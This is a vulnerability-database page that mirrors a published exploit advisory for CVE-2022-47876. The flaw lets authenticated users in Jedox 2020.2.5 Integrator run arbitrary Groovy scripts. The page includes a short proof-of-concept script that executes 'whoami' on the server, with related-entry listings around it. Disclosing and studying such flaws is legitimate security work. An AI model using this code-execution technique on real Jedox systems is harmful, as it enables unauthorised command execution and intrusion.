Lucene search
K

Jedox 2020.2.5 Groovy-Scripts Remote Code Execution

🗓️ 05 May 2023 00:00:00Reported by Christoph Mahrl, Patrick Pirker, Michael Wedl, Aron MolnarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 309 Views

Jedox 2020.2.5 Groovy-Scripts Remote Code Execution vulnerability allows remote authenticated users to execute arbitrary code via Integrato

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts Vulnerability
5 May 202300:00
zdt
Circl
CVE-2022-47876
3 May 202300:30
circl
CNNVD
Jedox 安全漏洞
2 May 202300:00
cnnvd
CVE
CVE-2022-47876
2 May 202300:00
cve
Cvelist
CVE-2022-47876
2 May 202300:00
cvelist
Exploit DB
Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
5 May 202300:00
exploitdb
EUVD
EUVD-2022-50633
3 Oct 202520:07
euvd
NVD
CVE-2022-47876
2 May 202320:15
nvd
Prion
Design/Logic Flaw
2 May 202320:15
prion
Positive Technologies
PT-2023-15508 · Jedox · Jedox
2 May 202300:00
ptsecurity
Rows per page
`# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts  
# Date: 28/04/2023  
# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl  
# Vendor Homepage: https://jedox.com  
# Version: Jedox 2020.2 (20.2.5) and older  
# CVE : CVE-2022-47876  
  
  
Introduction  
=================  
Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.  
  
  
Write-Up  
=================  
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.  
  
  
Proof of Concept  
=================  
1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:  
  
def sout = new StringBuilder(), serr = new StringBuilder()  
def proc = 'whoami'.execute()  
proc.consumeProcessOutput(sout, serr)  
proc.waitForOrKill(10000)  
LOG.error(sout.toString());  
LOG.error(serr.toString());  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2023 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.0806
309